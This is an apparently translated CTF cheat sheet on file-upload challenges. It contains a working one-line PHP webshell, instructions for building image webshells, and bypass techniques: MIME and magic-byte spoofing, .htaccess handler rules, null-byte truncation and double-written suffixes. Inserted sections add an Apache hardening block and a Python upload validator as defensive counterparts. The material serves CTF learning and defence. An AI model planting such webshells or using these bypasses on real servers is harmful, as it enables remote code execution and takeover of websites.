CTF skill tree - file upload
2022-07-28 10:54:00 【jjj34】
Tool used: AntSword (中国蚁剑, "Chinese ant sword")
1. One-sentence webshell (一句话木马)
<?php
eval($_POST["pass"]);
2. Image webshell (图片马)
Built with the copy command:
copy name1.png/b+name2.php/a name3.php
name1 is the image file
/b marks it as a binary file
name2 is the one-sentence webshell file
/a marks it as an ASCII file
name3 is the name of the resulting image
When uploading, use burp_suite to change the Content-Type to image/png
3. Disable JavaScript (front-end check)
In the browser settings, search for JavaScript and disable it, then upload

4. MIME bypass
Use burp_suite to change the declared file type (Content-Type)

5. File header detection
Use burp_suite to change the file header bytes so that the firewall mistakes the file for an image

89 50 4E 47 is the PNG image signature
6. Bypass by adding GIF89a

The principle is again to make the firewall believe the file is an image. Common signatures:
GIF: GIF89a
JPEG (JPG): FF D8 FF
PNG: 89 50 4E 47
Tip: to find the place to insert the header, put four + characters in front of <?php, then switch to the Hex view and overwrite those bytes

7. Bypass via .htaccess
Construct a .htaccess file:
1. Execute files whose name matches a pattern as PHP
<FilesMatch "asdf">
SetHandler application/x-httpd-php
</FilesMatch>
2. Execute .png files as PHP (not very reliable)
AddType application/x-httpd-php .png
8. 00 truncation
Two conditions must hold for truncation to occur:
php < 5.3.4
magic_quotes_gpc = off
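For the .htaccess technique in section 7, the server-side fix is to stop Apache from honouring uploaded .htaccess files and from running any script handler out of the upload directory at all. The virtual-host fragment below is an added defensive example, not part of the write-up; the directory path is an assumed location, the php_flag line only applies when PHP runs as mod_php, and the Header line needs mod_headers.

```apache
# Added example (not from the write-up). Assumed upload location: /var/www/html/upload
<Directory "/var/www/html/upload">
    # Ignore any .htaccess that ends up in the upload directory
    # (defeats both the FilesMatch/SetHandler and AddType variants above).
    AllowOverride None

    # Deny direct requests for anything that looks like a PHP script,
    # so a renamed or doubled-suffix file is never reachable.
    <FilesMatch "\.(php|phtml|phar|php[0-9])$">
        Require all denied
    </FilesMatch>

    # mod_php only: no PHP engine in this directory, whatever the handler says.
    php_flag engine off

    # Serve every file as an opaque download and stop browser sniffing,
    # so an image with embedded script is never interpreted as anything else.
    ForceType application/octet-stream
    Header set X-Content-Type-Options "nosniff"
</Directory>
```

Run apachectl configtest after adding the block; the FilesMatch deny and AllowOverride None are the two lines that matter, the rest is defence in depth.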
Challenge description: after uploading, the page does not return the file name
This means the file is being renamed, so we add a truncation character to break the rename
Solution:
1. Upload the image webshell
2. Truncate in the URL field so that the system does not rename the file

3. Visit the file
AntSword connection:
http://challenge-98be3014d8744500.sandbox.ctfhub.com:10800/upload/1.php
9. Double-writing bypass
The filter deletes the forbidden suffix, so write it twice and let the deletion leave one copy behind
For example .pphphphpp, taken apart: p(php)h(php)p, so after both inner php are removed, php remains
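Sections 4 to 9 above each defeat one check in isolation: a spoofed Content-Type, a pasted GIF89a or PNG header, a null byte in the file name, or a doubled suffix against a strip-style blacklist. The Python below is an added defensive example, not code from the write-up, showing the strip filter that the double-writing trick targets next to a layered validator that judges the last extension against an allowlist, refuses null bytes, checks the content against the signature for that extension, and ignores the declared MIME type entirely. All file names and contents in it are constructed samples.

```python
import re

# Image signatures named in the write-up (GIF89a, JPEG FF D8 FF, PNG 89 50 4E 47).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXT = frozenset(MAGIC)
# Basename allowlist: letters, digits, _ and - only, so "1.php.png" is rejected
# (Apache may treat a file with several extensions as a script).
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def naive_strip_filter(filename):
    """The blacklist that the double-writing trick (section 9) defeats.

    Removing every 'php' in one left-to-right pass turns 'x.pphphphpp'
    into 'x.php', which is exactly the suffix the filter meant to forbid.
    """
    return filename.replace("php", "")


def validate_upload(filename, content, declared_mime):
    """Layered check. Returns (accepted, reason).

    The declared Content-Type is reported but never used as a decision input,
    because a proxy (sections 2 and 4) can set it to anything.
    """
    if "\x00" in filename:                       # section 8: null-byte truncation
        return False, "null byte in filename"
    base, dot, ext = filename.rpartition(".")    # judge the LAST extension only
    if not dot:
        return False, "no extension"
    ext = ext.lower()                            # ".PHP" / ".pHp" are still php
    if ext not in ALLOWED_EXT:                   # allowlist, never a strip filter
        return False, "extension %r not in allowlist" % ext
    if not SAFE_BASENAME.match(base):
        return False, "unsafe basename %r" % base
    if not any(content.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match %s signature" % ext   # sections 5/6
    if b"<?php" in content or b"<?=" in content: # GIF89a header + script body
        return False, "script tag inside image data"
    return True, "ok (declared type %s ignored)" % declared_mime


if __name__ == "__main__":
    # Constructed samples exercising each bypass from the write-up.
    print(naive_strip_filter("1.pphphphpp"))
    for name, data in [
        ("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("shell.php", b"<?php /* constructed sample */ ?>"),
        ("a.png", b"GIF89a<?php /* constructed sample */ ?>"),
        ("a.gif", b"GIF89a<?php /* constructed sample */ ?>"),
        ("1.php\x00.png", b"GIF89a"),
        ("1.php.png", b"\x89PNG\r\n\x1a\n"),
    ]:
        print(repr(name), validate_upload(name, data, "image/png"))
```

The signature check on its own is the weakest layer, since section 6 shows it is satisfied by six pasted bytes; what actually stops the image webshell is that an allowlisted image extension is never handed to a script handler (see the Apache fragment under section 7) and that the server stores the file under a name it generates itself rather than the one the client sent.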
10. Changing how the file name is parsed

Looking at the screenshot, the source code hints that the uploaded file is parsed by python and that only files with the suffix .jpg or .png are accepted, so we call the os library in python to run the remote command execution command

Change the file suffix to 11.png

The flag is obtained successfully